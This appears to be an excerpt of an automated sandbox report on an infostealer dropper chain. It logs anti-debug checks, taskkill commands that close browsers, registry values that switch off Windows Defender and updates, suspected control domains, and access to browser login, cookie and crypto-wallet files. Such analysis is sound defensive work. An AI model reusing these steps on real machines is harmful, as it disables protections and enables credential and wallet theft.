Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\DP4Z2JGIRNCYT3CKHONMY.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\8EKC9XRWVAAE9N5ITBV1P67OSMSENNC.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\ZVNI3QDRJUMHB5ZEQG5Z2C.exe Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00CAD585 rdtsc 3_2_00CAD585
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Code function: 3_2_00B1B974 LdrInitializeThunk, 3_2_00B1B974
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\W7N881PI98FKFOKWDI7HCS7W.exe Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion

Source: Yara match File source: Process Memory Space: 7451ae0b11.exe PID: 6196, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe, type: DROPPED
Source: file.exe, 00000000.00000003.2143331611.0000000005100000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: scriptyprefej.store
Source: file.exe, 00000000.00000003.2143331611.0000000005100000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: navygenerayk.store
Source: file.exe, 00000000.00000003.2143331611.0000000005100000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: founpiuer.store
Source: file.exe, 00000000.00000003.2143331611.0000000005100000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: necklacedmny.store
Source: file.exe, 00000000.00000003.2143331611.0000000005100000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: thumbystriw.store
Source: file.exe, 00000000.00000003.2143331611.0000000005100000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: fadehairucw.store
Source: file.exe, 00000000.00000003.2143331611.0000000005100000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: crisiwarny.store
Source: file.exe, 00000000.00000003.2143331611.0000000005100000.00000004.00001000.00020000.00000000.sdmp String found in binary or memory: presticitpo.store
Source: C:\Users\user\AppData\Local\Temp\S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe "C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe "C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe "C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe"
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: 760934cb92.exe, 0000000D.00000000.3024294213.0000000000932000.00000002.00000001.01000000.0000000F.sdmp Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe, skotes.exe Binary or memory string: #3Program Manager
Source: 7YW0363WEKP7ULOI0QRA.exe, 7YW0363WEKP7ULOI0QRA.exe, 00000003.00000002.2507726360.0000000000D08000.00000040.00000001.01000000.00000006.sdmp Binary or memory string: "fProgram Manager
Source: firefox.exe, 0000001A.00000002.3217054997.00000045F48BB000.00000004.00000010.00020000.00000000.sdmp Binary or memory string: ?Progman
Source: S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe, 00000004.00000002.2427168809.0000000000FF9000.00000040.00000001.01000000.00000007.sdmp, skotes.exe, 00000005.00000002.2465538734.0000000000C89000.00000040.00000001.01000000.0000000B.sdmp Binary or memory string: #3Program Manager
Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002537001\760934cb92.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002538001\num.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1002538001\num.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002536001\7451ae0b11.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications Registry value created: DisableNotifications 1
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Registry value created: TamperProtection 0
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\7YW0363WEKP7ULOI0QRA.exe Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations
Source: 58ce8f976c.exe, 0000000C.00000003.3201552486.0000000005FDD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: les%\Windows Defender\MsMpeng.exe
Source: file.exe, file.exe, 00000000.00000003.2231556673.0000000001547000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2356276215.0000000001537000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269022223.0000000001538000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2231556673.000000000155A000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2971263867.0000000000FBF000.00000004.00000020.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.3165170457.0000000005941000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.2965626159.0000000005941000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000A.00000003.3093935031.0000000005942000.00000004.00000800.00020000.00000000.sdmp, 58ce8f976c.exe, 0000000C.00000003.3179090240.0000000005FDD000.00000004.00000800.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Users\user\Desktop\file.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Source: Yara match File source: 4.2.S70TEYDWG0MIRHL2D28PBWQHSI2HDI.exe.e10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.skotes.exe.aa0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 33.2.DP4Z2JGIRNCYT3CKHONMY.exe.9f0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000004.00000003.2386839542.0000000005390000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000003.3207148284.00000000049B0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2465363519.0000000000AA1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000021.00000002.3249445453.00000000009F1000.00000040.00000001.01000000.0000001B.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000003.2425000445.0000000004D20000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000004.00000002.2427095696.0000000000E11000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000008.00000003.2711130539.0000000004910000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 760934cb92.exe PID: 7144, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: file.exe PID: 1880, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 58ce8f976c.exe PID: 6068, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: 58ce8f976c.exe PID: 504, type: MEMORYSTR
Source: Yara match File source: sslproxydump.pcap, type: PCAP
Source: Yara match File source: 32.2.num.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 32.0.num.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 37.0.num.exe.bf0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.7451ae0b11.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.7451ae0b11.exe.140000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000020.00000002.3135249068.0000000000BF1000.00000080.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.2960373733.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.3127862196.0000000004BA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3268929874.0000000000141000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000002.3144922950.000000000163E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3001129617.0000000000141000.00000040.00000001.01000000.0000000E.sdmp, type: MEMORY
Source: Yara match File source: 00000020.00000000.3116653245.0000000000BF1000.00000080.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000000.3280933460.0000000000BF1000.00000080.00000001.01000000.0000001A.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3004186690.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.3274363852.0000000000F8B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: 7451ae0b11.exe PID: 6196, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\num[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1002538001\num.exe, type: DROPPED
Source: Yara match File source: dump.pcap, type: PCAP
Source: file.exe String found in binary or memory: Wallets/Electrum
Source: file.exe String found in binary or memory: Wallets/ElectronCash
Source: file.exe String found in binary or memory: Jaxx Liberty
Source: file.exe String found in binary or memory: window-state.json
Source: file.exe String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: file.exe String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
Source: file.exe String found in binary or memory: %appdata%\Ethereum
Source: file.exe, 00000000.00000003.2173815846.0000000001569000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
Source: 58ce8f976c.exe, 0000000A.00000003.2911175052.0000000000F3E000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Exodus\exodus.wallet\
Source: file.exe, 00000000.00000003.2218538984.000000000155D000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: keystore
Source: file.exe, 00000000.00000003.2218579742.0000000001538000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\logins.json
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfe
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbb
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cert9.db
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknn
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdaf
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapac
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpak
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhm
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhk
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohao
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddfffla
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\AppData\Local\Temp\1002535001\58ce8f976c.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
